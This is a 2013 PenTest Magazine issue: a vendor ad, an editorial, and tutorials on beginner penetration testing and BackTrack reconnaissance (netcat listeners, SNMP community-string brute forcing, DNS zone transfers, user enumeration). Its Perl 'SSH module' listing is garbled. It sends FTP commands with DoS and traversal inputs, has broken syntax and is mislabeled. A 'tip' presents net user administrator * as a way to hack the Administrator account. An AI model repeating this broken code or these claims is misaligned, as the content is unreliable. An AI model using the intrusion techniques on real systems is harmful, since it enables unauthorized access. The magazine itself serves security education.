pentest mag 2013 07

Cyber Security Auditing Software

www.titania.com

Improve your Firewall Auditing As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and rewall devices. Any security issues identied within those technologies will then have to be explained in a way that both management and system maintainers can understand.

he network scanning phase of a penetration assessment will quickly identify a number of security

weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices.

Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

www.titania.com

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titanias products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customers specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own companies styling. Each report can then be saved in a variety of formats for management of the issues.

Why not see for yourself, evaluate for free at titania.com

http://pentestmag.comOPEN 06/2013

Editor in Chief: Ewa [email protected]

Managing Editor: Jakub [email protected]

Editorial Advisory Board: Jeff Weaver, Rebecca Wynn, William F. Slater, III

Betatesters & Proofreaders: Jackson Bennet, Amit Chugh, Gregory Chrysanthou, Rodrigo Comegno, Dan Dieterle, Pinto Elia, Zbiegniew Fiona, Jos Luis Herrera, Antonio James, Duncan Keir, David Kosorok, Gilles Lami, L. Motz, Horace Parks, Jr, Sagar Rahalkar, Micha Rogaczewski, Antonio Domenico Saporita, Robin Schroeder, Jeff Smith, Johan Snyman, Arnoud Tijssen, Tom Updegrove, Jakub Walczak and others

Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine.

Senior Consultant/Publisher: Pawe Marciniak

CEO: Ewa Dudzic [email protected]

Production Director: Andrzej Kuca [email protected]

Art Director: Ireneusz Pogroszewski [email protected]

DTP: Ireneusz Pogroszewski

Publisher: Hakin9 Media02-682 Warszawa, ul. Bokserska 1Phone: 1 917 338 3631www.pentestmag.com

Whilst every effort has been made to ensure the high quality of

the magazine, the editors make no warranty, express or implied,

concerning the results of content usage.

All trade marks presented in the magazine were used only for

informative purposes.

All rights to trade marks presented in the magazine are

reserved by the companies which own them.

DISCLAIMER!The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear PenTest Readers,

You are probably wondering what will you find in the up-coming issues of the magazine. The free (as you prob-ably already know, since you are reading this) PenTest OPEN, as always, is here to answer this question and show you what can you expect from our future publications.

This month, we will go back a bit to the past and give you a glimpse on what can you find in our July release enor-mous (150 pages) BackTrack Compendium. We decided to give you an opportunity to take a look at three articles from this issue of PenTest Extra. Davide Peruzzi, OSCP, will bring your attention to the importance of preperation to pen-testing. Also, Lance Claghorn will discuss the five common stages of an attack and how to use them for testing. Finally, Mathieu Nayrolles, Mathieu Schmitt, and Benot Delorme will provide you with a broad guide to using BackTrack for penetration testing.

Time for something fresh for the freshmen. Our recently published Starter Kit gives you several tips on how to be-come a pentesting rock star. In PenTest OPEN we give you two tastes of what you will find in the issue. Chris Berberich guides our young cadets through a properly conducted pen-etration test and shows how to avoid typical mistakes. On the other hand, Jane Andrew advices how to save the world business by pentesting smartphone.

In addition, continuing the smartphone topic, Michael Trofi and Duane Schleen put the limelight on the risks com-ing out of mobile applications vulnerabilities. To finish our journey through the issue, Fadli B. Sidek will instruct you how to evade anti-virus and anti-spam detection.

We hope you will enjoy PenTest OPEN and gain much new knowledge. Have a nice read!

Jakub Walczak and PenTest Team


FOR STARTERS

06 Pivotal Basics for Every BeginnerBy Chris BerberichPentesting is always very hard at the beginning. People often make really trivial mistakes. Steps and suggestions in this article will help you avoid most of them and con-duct a proper pentest.

FROM: Starter Kit 03/2013 Become Well-known Penetester Today

BACKTRACK

12 Sharpen your Axe with BackTrackBy Davide PeruzziAbraham Lincoln said Give me six hours to chop down a tree and I will spend the first four sharpening the axe. This is really the basic concept and the starting point of every penetration test.

FROM: PenTest Extra 03/2013 BackTrack Compendium

18 Pentesting with BacktrackBy Mathieu Nayrolles, Mathieu Schmitt, and Benot Delorme

Penetration testing, also known as pentesting, is a tech-nique to evaluate the security of computers and networks by performing imitating attacks from external and internal threats. The pentesting process involves static and dy-namic analysis of a system/network in order to reveal po-tential security issues resulting from improper configura-tions or hardware/software flaws. These attacks should be executed from the point of view of potential attackers. FROM: PenTest Extra 03/2013 BackTrack Compendium

40 Multiphase Penetration Testing: Using BackTrack Linux, Metasploit and Armitage

By Lance CleghornThe EC Council identifies five stages of attack that are common to cyber penetration. These stages of attack may be used to categorize incidents where a network or a host has been compromised. Considering that these stages are common to real attacks, they are used by ethi-cal hackers to conduct penetration testing. An ethical hacker or a white-hat hacker may use these steps in or-der, or may selectively choose the steps that work best for the particular vulnerability.

FROM: PenTest Extra 03/2013 BackTrack Compendium

SMARTPHONES

46 Mobile Applications: The True Potential Risks Where to Look for Information When Performing a Pentest on a Mobile Application

by Michael Trofi and Duane SchleenThis article mainly covers what security professionals should be looking for when performing a penetration test of a mobile application. Although, similar data concerns exist on the Android and Windows 7-based phones, the main discussion here concentrates on data found for iOS applications.

FROM: PenTest WebApp 01/2013 Build Your Own Pentesting Workshop (TO BE RELEASED)

54 Employers: Smartphone Pentesting could Save your BusinessBy Jane Andrew

Are you an owner of a company? If so, you cannot miss this article. It will help you improve your firm security and avoid unneccessary expenses.

FROM: Starter Kit 03/2013 Become Well-known Penetester Today

ANTI-VIRUS SOFTWARE

60 AV Evasion: Bypassing AV Products and Protection Against Itby Fadli B. Sidek

AV evading techniques are getting better and smarter by the day, and having just an AntiVirus and AntiSpyware application is insufficient to protect our machines from additional angles of threats.

FROM: PenTest Regular 05/2013 (TO BE RELEASED)

CONTENTS

FOR STARTERS

Page 6 http://pentestmag.comOPEN 06/2013

I believe that penetration testing, and any other in-ternet security field, is more of a frame of mind than anything, i.e. thinking outside the box. When a person asks what I do for a living and I tell them I am a pentester, their response is always the same What is that and how can I get that title? I have the same answer every time a penetration test is a chess match. It is played between the pentester and the contracting organizations IT department. You start out as a pawn and end up as a queen. That queen must be able to accomplish check-mate in the organization's network infrastructure.

There are three different groups of educated pen-testers. There is the self-educated, which include people like gamers and those who are simply curi-ous about how to hack a network. Then you have the college educated, who decided to go to school and learn how a network operates and how to se-cure the network. Lastly, you have the third cate-gory, which combines the first two. Neither is better than the other, because to become a well-known pentester, you must be educated in networking, have certifications to prove you can go the extra mile and be up to date with the latest technologies.

Types of PentestersA pentester is considered an ethical hacker be-cause there has to be a level of trust between the

hiring organization and the tester. When I tell peo-ple I am a pentester, I usually follow by explain-ing that I am an ethical hacker. It is confusing be-cause these two roles can seem to conflict with one another. Before becoming a pentester, you have to decide which group of hackers you want to fall under, a white hat, grey hat, black hat hacker, or a script kiddie. The term hacker has not al-ways had the negative connotations that it has to-day. A hacker originally described a person with a desire to learn about and experiment with technol-ogy and referred to someone who was technically proficient with whatever systems they hacked. The group under which you portray yourself will deter-mine if you should pursue a career as a pentester.

White hats may be security professionals, hired by companies to audit network security or test soft-ware. Having access to the same software tools that other hackers use, a white hat seeks to im-prove the security of a network by attacking a net-work or application as a black hat hacker would.

A black hat hacker is a person who attempts to find network and application security vulnerabili-ties and exploit them for personal financial gain or other malicious reasons. This differs from white hat hackers, who are security specialists employed to use hacking methods to find security flaws that black hat hackers may exploit.

Is being a pentester your dream job? Would you like to do pentesting every day until the death but you do not know what to start with? In this article I will describe all you need to begin the journey.

Pivotal Basics for Every Beginner

Article comes from Pen Test StraterKit.

Download the complete issue.


Black hat hackers can inflict major damage on both individual computer users and large organizations by stealing financial information, compromising the se-curity of systems, or by dropping a network or chang-ing the function of websites and networks.

A grey hat is willing to go to the extremes of both black and white hat hackers. Black hats typically indulge to prove a point that is usually supported by white hats. A person's grey "principles" are the very thing that sets them apart from other classi-fied hackers. In most situations, they may not dis-close their activities due to legal consequences. It is not out of the question for a grey hat hacker to hack for personal gain, although it is also not un-heard of for them to compromise whole systems for the perceived "greater good" either.

A script kiddie is a derogatory term used to refer to non-serious hackers who are believed to reject the ethical principles held by professional hackers, which include the pursuit of knowledge, respect for skills, and a motive of self-education. Script kiddies shortcut most hacking methods in order to quickly gain their hacking skills. They will use resources such as YouTube and watch a video of an actual attack performed by a genuine hacker and then try to replicate the attack. They attempt to attack and crack computer networks and vandalize websites. Although they are considered to be inexperienced and undeveloped, script kiddies can impose as much computer damage as skilled hackers.

The majority of pentesters fall under the white hat, grey hat, and script kiddie group. You really cannot be a black hat and a pentester because that means you deliberately destroy a network when you perform a pentest. In this industry you will not last long with that mentality.

Yes, I put some of the pentesters in the script kiddie group. Over the years, I have looked over other companies' pentest reports and it baffles me how some organizations pass off their reports as serious pentest reports when they are more like a vulnerability assessment. I have seen instances when a company would run a vulnerability scan-ner and turn those results in as a pentest report. In other cases, I have seen reports delivered by an organization that only ran Metasploit (which is a program that does exploits for you). The problem with these situations, is that, first, these are not ex-amples of penetration tests but rather are just vul-nerability assessments. Second, we lose our skills as IT security professionals if we rely solely on GUI interface tools. The only thing you learn from this experience is how to use a GUI interface and how

to hit the start button. To me, this is a huge prob-lem. I believe that in order to be a well-known pen-tester, you need to know what is going behind the scenes of that vulnerability scanner and exploits. Ask yourself what is it actually scanning? When I begin a pentest, there is a lot I need to prepare be-fore I even start scanning.

Penetration Testing vs Vulnerability AssessmentVulnerability Assessment:

Typically is general in scope and includes an as-sessment of the network or a web application,

A scan that will identify known network, operating system, web application, and web server vul-nerabilities with the use of GUI Interface tools and doing very minimal exploiting, if any,

Unreliable at times and high rate of false posi-tives.

Penetration Testing:

Focused in scope and may include targeted at-tempts to exploit specific vectors,

Extremely accurate and reliable,Penetration Testing = vulnerabilities that have

been exploited and confirmed.

It is impossible to say that a Vulnerability Assess-ment is better choice than a Penetration Test. Both Vulnerability Assessments and Penetration Tests are a necessity to an organizations network security. I suggest at a minimum, that you run a vulnerability assessment at least every three months and a full blown Penetration Test once a year. By doing this, you ensure the hardening of your network from hackers.

Testing PhasesThough the methodology used by a pentester may change depending on individual preferences, cli-ent contract or employer principles for the most part all methodologies include the same stages.

Planning and ScopingThe planning and scoping stage occurs when your organization and the client decide what is within the scope and what needs to be excluded from the test. As a pentester, you must be aware of any potential risks associated with the pentest. Before you start the penetration test always get a get out of jail free card this is a signed document

FOR STARTERS


from the organization and yourself. This document should include the scope of the test, URLs, Exter-nal and Internal IPs to be tested. Also there needs to be some verbiage if the network does go down or there is severe bandwidth issues that interrupts the organizations everyday business continuality from your GUI scanners. Also, it should state that they have everything backed up and cannot go af-ter you for any reason legally.

Here is an example of a scope between yourself and the client:

The scope encompassed the internal and external network infrastructure which included routers, serv-ers, and firewalls hosted in the organizations Cin-cinnati, Ohio office. The network penetration test was performed from organizations network in the

Cincinnati, Ohio office.

Information gatheringIn this phase, the penetration tester will accumu-late as much information as possible that will as-sist with the test. This includes public records, email addresses within the organization, and the organizations web presence. In the initial stage, web search engines are used to gather as much information about the target organization as possi-ble including target machines on the network. The next step is to find live hosts on the network, which can be achieved through the use of discovery tools such as Nmap. After gathering a list of machines on the network and the open ports, we have to ver-ify that the ports are actually open. The reason for this is that sometimes machines give false results, especially UDP ports. So for example, we identi-fied a machine with a lot of ports open and with an IP address of 10.5.1.1. Lets do a little reconnais-sance on that target.

ReconnaissanceIn this stage, the penetration tester starts to as-sess all of the options available within the scope of the penetration test. The pentester decides what tools are to be used and the method of the pentest itself. This will include methods such as network scanning, enumeration, and code injec-tion. The goal of reconnaissance is to classify vulnerabilities that the tester will then attempt to exploit in the next phase. There are many vulner-ability scanners out there, so which one should I use? Personally, I use several to make sure that there are as few false positives on the vulnerabil-ity report itself. As a penetration tester, you have

to be resourceful and use what is available. For this test lets use a vulnerability scanner within Kali. You are probably also wondering why you would use a vulnerability scanner when such a tool creates a lot of noise on the network? It is very simple. The job of a penetration tester is to be as thorough as possible, uncovering as many holes as they can find. It is always the penetra-tion testers job to verify each vulnerability found before marking it as a positive result and to re-move all the false positives. There are hundreds of pages of information in the scan report. I would suggest looking at all of the results. For this case, the one that I am interested in is the vulnerability marked as high, so I am going to click on this one and see what it says. The scanning of 10.5.1.1 found the password anonymous within the FTP account.

Here is an example of a vulnerability that could be exploited which was found as the result of the vulnerability scanner:

Anonymous FTP

Synopsis: Disable anonymous FTP access. If it is not needed. Anonymous FTP access can lead to an attacker gaining information about your system that can possibly lead to them gaining access to your system.

Exploitable

Risk Factor: Medium (CVSS 7.1)

Host: 10.5.1.1

ExploitationExploiting is the art of taking advantage of known vulnerabilities discovered in the scanning phase. The idea is to gain access to the systems as a hacker would and exploit them. This may include SQL injections, Input Validation, Cross-Site Script-ing and Broken Authentication and Session Man-agement. We will be using the username list that we grabbed during the vulnerability assessment phase (I created a file named anonymous.doc with the name anonymous), and a copy of the pro-vided wordlist that comes within the applications of Kali. We will also run the SSH module written in Perl, since we already know that the anonymous account is enabled for FTP. Lets look up the CVE numbers and search Google. CVE-1999-0527 is the CVE number that I found using Google. So to


make sure this isnt a false positive, lets go back to the SSH module and re-scan for an anonymous password on the FTP account.

[22][ssh] host: 10.5.1.1 login: anonymous password: anonymous

Privilege escalationExploiting a system can result in access to the sys-tem with rudimentary privileges. Privilege escala-tion is the process to gain further access and ad-ditional permissions. Learning manual exploits is a key step to becoming a well-known penetration tester and not using a GUI interface tool to do the exploit for you. Automated tools can cause a drop in a networks bandwidth or drop the network it-self. Causing this to happen will give you a bad reputation. While pressing start on a GUI tool, it goes through a lot of unneeded functions like ddos and dos attacks, which are not usually welcomed by your client. It takes a lot of time and practice to

gain privileges to systems doing manual exploits but it is well worth it. Although exploiting a system results in access, on many instances, that access is limited to an account with only rudimentary per-missions.

Privilege escalation is the process of using fur-ther techniques or exploits to gain further permis-sions. The more permission gained, the more like-ly a tester is of achieving access to further systems and confidential data.

For this we will run an SSH module written in Perl (Listing 1).

As you can see, we successfully exploited the FTP account. So you have your results from the vulnerability scanner(s) and completed a few ex-ploits. Now you have to present to the organiza-tion the vulnerabilities and exploits. This is done by writing a complete report. Remember to take screen shots of the exploits so that you have proof of the exploit being completed. This will show the organization that you truly know what you are do-

Listing 1. SSH module in Perl

#!/usr/bin/perl$user = "USER anonymous\r\n";$passw = "PASS [email protected], 192.168.91.13, 192.168.91.12, 192.168.90.251, 192.168.90.253\r\n";$command = "CWD ";$dos_input = "."x250;$send = "\r\n";$socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$ARGV[0]",PeerPort => "$ARGV[1]",$socket->recv($serverdata, 1024);print $serverdata;$socket->send($user);$socket->recv($serverdata, 1024);$socket->send($passw);$socket->recv($serverdata, 1024);$socket->send($command.$dos_input.$send);$user = "USER anonymous\r\n";$passw = "PASS [email protected], 192.168.91.13, 192.168.91.12, 192.168.90.251, 192.168.90.253\r\n";$command = "NLST ";$dos_input = "/.../.../.../.../.../";$send = "\r\n";$socket = IO::Socket::INET->new(Proto => "tcp",

PeerAddr => "$ARGV[0]",PeerPort => "$ARGV[1]",$socket->recv($serverdata, 1024);print $serverdata;$socket->send($user);$socket->recv($serverdata, 1024);$socket->send($passw);$socket->recv($serverdata, 1024);$socket->send($command.$dos_input.$send);$user = "USER anonymous\r\n";$passw = "PASS [email protected], 192.168.91.10, 192.168.91.13, 192.168.91.12, 192.168.90.251, 192.168.90.253\r\n";$command = "SIZE ";$dos_input = "/.../.../.../.../.../";$send = "\r\n";$socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$ARGV[0]",PeerPort => "$ARGV[1]",$socket->recv($serverdata, 1024);print $serverdata;$socket->send($user);$socket->recv($serverdata, 1024);$socket->send($passw);$socket->recv($serverdata, 1024);$socket->send($command.$dos_input.$send);$socket->exploit successful/r/nanonymous

FOR STARTERS


ing as a pentester, and you will be on your way to becoming a well-known penetration tester.

ReportingThis section provides the contracting organiza-tion a summary of the results from the vulnerability scanner and exploits that were accomplished dur-ing the pentest. The report is broken down into two major sections in order to communicate the objec-tives, methods, and results of the testing to an ex-ecutive level and IT staff. The report should be bro-ken down into:

The Executive Summary, which would include: Executive Summary of the penetration test, Scope, Background section explaining the overall posture of the organization, and a rec-ommendation Summary.

The Technical Report, which would be organized for the IT staff so that they can review and fix the vulnerabilities. This part of the report should include Information Gathering, Vulner-ability Assessment, Exploitation/ Vulnerability Confirmation, and the risk of the vulnerabilities to the organization.

CertificationsWhy get certifications? Some of the best hack-ers do not have certifications, so why should I get them? You do so because you want to become a well-known penetration tester and not just a hacker. To do this, you need to show that your skills are up to date and that you are willing to put in the time to show your employer that you have the skills to do a penetration test. Youre also impressing on your employer that youre a valued member of the team and that youre willing to learn. There are many cer-tifications to choose from. A few that stand out are: Certified penetration Testing Engineer (C)PTE, Cer-tified Penetration Testing Consultant C)PTC, GIAC Penetration Tester (GPEN), Certified Ethical Hacker (CEH) and Offensive Security Certified Professional (OSCP). It seems everyone has their own prefer-ence in choosing which one is better that the other.

SummaryThe process of becoming a well-known penetra-tion tester is not going to happen overnight. Being a pentester is my dream job when it comes to IT security. Taking this journey and becoming a well-known penetration tester involves the pursuit of knowledge whether it is self-taught or through for-mal education. It is essential to become acquaint-

ed with network basics, particularly the OSI model, TCP/IP, handshakes, the different types of pack-ets, and what's contained in the headers.

I also suggest getting an understanding of net-work scanners and web application scanners. There are plenty of organizations out there that have white papers and tutorials regarding net-works and web applications (OWASP, SANS, and NIST). Find practice labs so that you can get prac-tice hacking networks.

With all this documentation and assistance it is quite simple to become a pentester, but to be a well-known pentester you must not be limited to one technology. You virtually need to know every-thing when it comes to servers, networks, and vul-nerabilities that can be exploited. You need to en-sure that you have a thorough understanding of security. Associate yourself with experienced pen-testers and join forums and communities that are willing to extend a helping hand. I was once told that the hacking community, in general, is willing to help newbies into the hacking community. In general that is a true statement.

To be a successful and well-known hacker you will need to understand and be able to write your own scripts and understand program languages. While you are on your way to learn about programming, the main question to ask is which language to learn? This debate has gone for years and there really is no cor-rect answer to it. Each organization for the most part uses one or two languages for their programming so that they can master the language and hire skilled programmers to keep the organization running. As a pentester you should know multiple languages to some degree and understand that language. Python is a good language to start off with because it's ef-ficiently designed, well documented in forums, and moderately kind to beginners. If you get into serious programming, you will have to learn C, the core lan-guage of Unix which a pentester should learn or have knowledge of. Perl is worth learning for everyday rea-sons; it's very widely used for web pages and system administration, so that even if you never write Perl, you should learn to read it.

Also, as a penetration tester you must stay up to date on coding, vulnerabilities, and updates to a network. The organization that hired you will ex-pect you to be current in all subjects related to IT security. There is a saying patch Tuesday, hack Friday this basically means when Microsoft patches come out on Tuesday, those pacthes are being hacked Friday. Remember there is bronto-bytes of information floating around the web. My

suggestion is to join forums, hacking organiza-tions, and read white papers form reliable sources to stay on top of the new technology out there.

In conclusion, not everyone will want to become a penetration tester or even know what one is, but with-in the professional community, there are some key steps to becoming well-known and respected. You must commit to continuing education, dont be afraid to ask for help, and practice and develop your skills.

BonusHere is some information which is useful but it did not fit into the article well.

Key knowledge

A penetration test is not a vulnerability scan and a vulnerability scan is not a penetration test,

Learn everything you can about operating sys-tems and servers, not just one flavor,

Understand the true concepts of TCP/IP, Subnets, and Coding in as many languages as possible,

Remember you will not know everything IT relat-ed, Google is your best friend.

TipHere is a tip that an old school hacker sent me at one point in time. It works about 60 percent of the time depending on the operating system and what not. As for all exploits, the same percentage could

go because you are not going to exploit and get root permissions every time you do a pentest due to time restraints within the scope.

If you want to hack a computers Administrator.If you are logged in to computer with some other

account here are the steps:

Go to start button click on runType CMD and press enterA command window will openType net usersThis will show you all the users of that computer.Now type net user administrator * and press enterThis will ask you to enter a passwordEnter the password you want to keep for the ad-

ministratorRe-enter your password to confirm it.DONE

ChRIS BERBERIChChris Berberich is a Penetration Tester/Senior Auditor at A-lign Security and Compliance Services based in Tam-pa, Florida. Chris has an extremely deep and solid under-standing of applications, server, and network security. Chris focus as a penetration tester was managing corpo-rate Internet infrastructure, systems, and network securi-ty specifically operating systems, web application serv-er, databases, interfacing, and data privacy. Certifica-tions: (C)PEH, (C)PTE. [email protected].

a d v e r i s e m e n t

BACKTRACK


Sharpen your Axe with BackTrackGathering phase

Abraham Lincoln said 'Give me six hours to chop down a tree and I will spend the first four sharpening the axe'. This is really the basic concept and the start point of every penetration test.

In a pen test you have to sharpen your axe first by gathering information. The more you obtain, the more surface to attack you will have.The gathering phase isn't the most exciting one,

but surely it is the one that will let you make things better and smarter. So what do you need? Let's see.

First, you need an adequate system with the right toolkit and a little knowledge of how they work. We will use one of the latest versions of BackTrack (BT) because it is a powerful and widespread op-erating system, so it will be quite simple to get sup-port or tutorials on the Web: Youtube has a video for almost all the BT tools.

The best way to start with BT is virtualization: you can download its virtual machine ready to be start-ed. In addition to virtualization, you can easily start a cheap and smart LAB to perform your tests. If you already have a test network, you can also use the bootable CD.

Next you have to be calm and patient, only this way you can collect information and inspect them rightly. You can make your own check-list of tests to do or copy one from the Web, but, when you have your list, you have to follow it meticulously. Remember that you are sharpening.

Now you need to write down all the data you col-lected in order to have everything recorded so that you can analyze it even when you aren't connect-

ed to the LAN you have to test. Furthermore you will use these records to make a detailed report for your customer or to roll back in case you mess something up.

I use Keepnote to keep track of all my opera-tions and results and Zenmap (Nmap GUI) to map the net, but BT has many more powerful tools than these. Maltego, for example, is awesome.

My friend NetcatNow let's start to use the father of all tools, the fa-mous 'Swiss-army knife for TCP/IP: Netcat'.

Essentially, NC, is a utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less.

So why is it so important?When a PC user without experience wants to

test if his machine is browsing the Internet, he opens his browser and points to a common ad-dress: www.google.com. This is not the best test he could do, he only finds out if he is browsing, but what about if he is not browsing?

So the approach must be different. He has to start from a layer closer to the PC, not closer to the user, and investigate the causes, step by step, up to the human layer.

You are not an inexperienced person, so you start by opening a command shell and pinging

Article comes from Pen Test Extra.



your gateway. Is it responding? If not, check it. Then ping an external IP address (e.g. 8.8.8.8 that is the Google DNS). Is it responding? Alright, you are able to go out of your network. Next you test if your DNS is working by pinging a DNS name like www.google.com. Only if all works fine, you open your browser and test the connection. Also, from the browser you can have a problem (e.g. a mis-configured proxy set in the browser) but, after all the tests you have done previously, you can rule out all lower layers and focus on the current one.

That's why NC is so important. It allow you to start from the lowest layer, it is the equivalent of the ping command used in the example, but it has many more applications.

Well, open your Terminal window and have a look at the NC help.

At the beginning you will use options -l (set NC in listening mode), -v (verbose mode is always bet-ter) and -p (set port where NC is listening). Try this:

Open two Terminal windows in the same ma-chine. In the first window start a service that listens on a specific port using Netcat (it is called the lis-tener).

nc -lvp 4444

If you have a look at the network connection of your BT machine, using the command netstat -nat, you will find a listening connection on port 4444 (tcp 0.0.0.0:4444 LISTEN).

In the second window use NC as a client and connect to localhost on port 4444

nc 127.0.0.1 4444 -v

Hit enter and you establish a simple connection with NC, but what is this?

Essentially, it is a simple chat. If you write some-thing in window 1, it will redirect to windows 2 and vice versa (see Figure 1).

So NC is a program that allows you to communi-cate using TCP or UDP protocols and you can use it whether as a client or as a server. TCP/UDP con-nections are more useful than a simple chat: you can use NC to test if a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; oth-erwise you can use it to redirect text, request html page, and, last but not least, remotely admin a PC.

If you have two PCs try to use NC between them or just continue the testing in the same machine (that is the lower layer).

For example, you can try to pass text:

echo 'This text will be transmitted using Netcat' | nc 127.0.0.1 4444

...and if the listener is as the following, you can al-so create a file with the text sent:

nc -lvp 4444 > file.txt

You can also try the -c option for remote adminis-tration. I suggest you to dig the Internet to search more about Netcat use.

Network hosts identificationAs I said, finding information about the target is the base of a successful test. What is the first thing you have to do when you reach a LAN you have to check? Find hosts to use as targets. If you can, create your own hosts individuation scripts using ping and NC or use some of the wonderful tools present in BT. In my opinion, the best are Unicorn-scan and Nmap, but, since I will shortly explain

Figure 2. Netdiscover at work

Figure 1. Netcat simple chat

BACKTRACK


them later, let's explore some other programs with less possibility, but working as well.

Start using netdiscover to find live hosts. Us-ing netdiscover -P a network scan is started using common LAN address (the one you are connected to) (see Figure 2).

Netdiscover can be also used on another net-work interface (-i) and IP range (-r). The -P op-tion is useful for a better output. Netdiscover is a continuing scan tool: it scans over and over the net in order to find new hosts and it could be used to implement a very simple intrusion detection sys-tem. To stop the scan you have to use [CTRL+C].

In a similar way you can use fping with option -g to analyze a range of IPs. Note that fping us-es ICMP protocol, whereas netdiscover uses ARP protocol to locate network hosts this is a good double check.

Don't forget to write down everything and trace all. Particularly start to compile a list of live hosts.

You can also try to give a DNS name to the hosts you find using smbscan, but you will notice that the program can find only a few, those with net bios name enable.

Let's now try to find something more using DNS discovering. If you are in a domain or if you are scanning for DNS name in the Web, you can try to operate a DNS zone transfer and capture DNS re-cords. When you can perform this operation, you get other sensible information and, maybe, hosts not previously discovered.

The DNS transfer zone is a query that synchro-nizes Primary and Secondary DNS servers but if administrators misconfigure them, everyone can query for transfer and get all DNS records.

DNSenum is a tool that tries to make a zone transfer and catch the results. The basic operation is quite simple: you just have to set the domain name to target.

Note that you can try the zone transfer both on a local (see Figure 3) or an Internet domain (see Figure 4).

You have to notice that a DNS zone transfer, even if successfully done, does not give hackers a direct access to the servers, but gives them many infor-mation that can be useful to expand the attack sur-face. Look at Figure 4; the DNS transfer zone high-lights at least 3 attack vectors: webmail, ftp, sftp.

It is therefore essential to block all the attacks and scans you can. Also ARP and ICMP scans must be stopped in a protected LAN. Unfortunately this isn't always practicable: in a Microsoft domain, for example, some administrative system tools do not work with restrictive local firewall policies.

It is not easy to find balance between security and efficiency.

You have done a good hosts analysis and you have a list of IPs alive in the network. Now you can start user account identification.

Find your accountAs for the hosts, users discovering can be done us-ing many methods. You can scan Google search-ing for email accounts of your target company, ex-plore corporate Web pages looking at pdf or word documents and who are the creators of this docu-ments; if you have access to the LAN you are test-ing, you can try to get information from SNMP or SMTP protocol.

Below are some scripts and programs that will help you, present in BT.Figure 4. DNSenum on a Web domain

Figure 3. DNS zone transfer on a local domain using host command


The harvest, by Edge-Security Research, is a very useful one, you will find it in the folder /pen-test/enumeration/theharvest. It searches for a company name in various resources database

(Google, Linkedin, PGP, Bing) and can be used to extract probable username. In Figure 5 you can see the result of a research: maybe vdiaz, cdelojo, cmartorella, and xmendez are also FTP, SSH or RDP users.

Again by Edge-Security.com, you can use meta-goofil (/pentest/enumeration/google/metagoofil/) to try to find users that create documents, down-loadable from the domain you point at, such as docs or pdfs.

As well as using Web search to catch company users' names/usernames, you can try to obtain in-formation by SNMP or SMTP.

SNMP is a protocol based on UTP that is often used to monitor server service status. The authen-tication methods (community strings) are passed in clear and often have the default state (public or private), so you can easily try to find it in order to get many information.

You can use programs such Snmpenum and Onesixtyone for this. Let's see how they work.

Initially you have to use Onesixtyone to enumer-ate comunity strings; with the info collected before, make a list of hosts and write it down to a file (/tmp/hosts.txt), then point to pentest/enumera-tion/snmp/onesixtyone and do the following:

./onesixtyone -c dict.txt -i /tmp/hosts.txt -o /tmp/log.txt

In this command you use a file dict.txt, already present in the onesixtyone folder, to 'brute force' the community strings; you use the hosts file you have found before to set targets and, at the end, make a log file. In Figure 6 you can find a sample of what you can get.

In the sample you see some printers, some switches and a server (192.168.1.10).

Go on and use snmpenum over 192.168.1.10 setting 'public' as community string, and the win-dows.txt template (already present) to merge out-put information (see Figure 7).

This is just a sample, but you can get much more information than these using SNMP. You can find processes running, opened ports, system informa-tion and much more.

For now, limit yourself to the users. What you want is to create a document like hosts.txt but with possible user names.

There are many other methods to identify users such as using SMTP server (smtpscan) and try to test the VRFY functionality (smtp-user-enum). Spi-dering a target website to collect unique words (/pentest/password/cewl) or sniffing network traffic (Wireshark) can also be useful. In the Backtrack > Information Gathering > Network analysis menu you can find many tools to reach your target. Try to find as many names as you can, but do not forget to add to your list the most common user names (root, admin, administrator).

Map the NETLet's have a look at network scanners, limiting us to a simple scan, with the only objective to

Figure 7. Snmpenum at work

Figure 6. Onesixtyone log

Figure 5. Maybe we have found some accounts

BACKTRACK


find some services that can be used as a target. Please, make sure to keep in mind that scanners are much more than what you will read here.

Of course, NC can be used as a network scan-ner, but the best programs are Unicorscan and Nmap so let's start with the first one. The com-mands in Figure 8 perform a simple scan, pointing at a single target (192.168.34.135), testing com-mon TCP (-m T) and UTP (-m U) ports, typical-ly those used by common services such as FTP, SSH, SMB, MySQL. The last command in Figure 8 is a scan of all the subnet 192.168.34.*, but only on FTP, SSH, SMB, and RDP ports.

You can perform the same thing using Nmap. The command nmap 192.168.34.135 scans TCP common port; if you add -sU option it will scan

UDP ports. The single target can be replaced with 192.168.34.*, 192.164.34.0/24 or your hosts.txt to explore all subnet or specific IPs; adding the option -p 21-23,3389 you will limit the scan to port 21, 22, 23 and 3389.

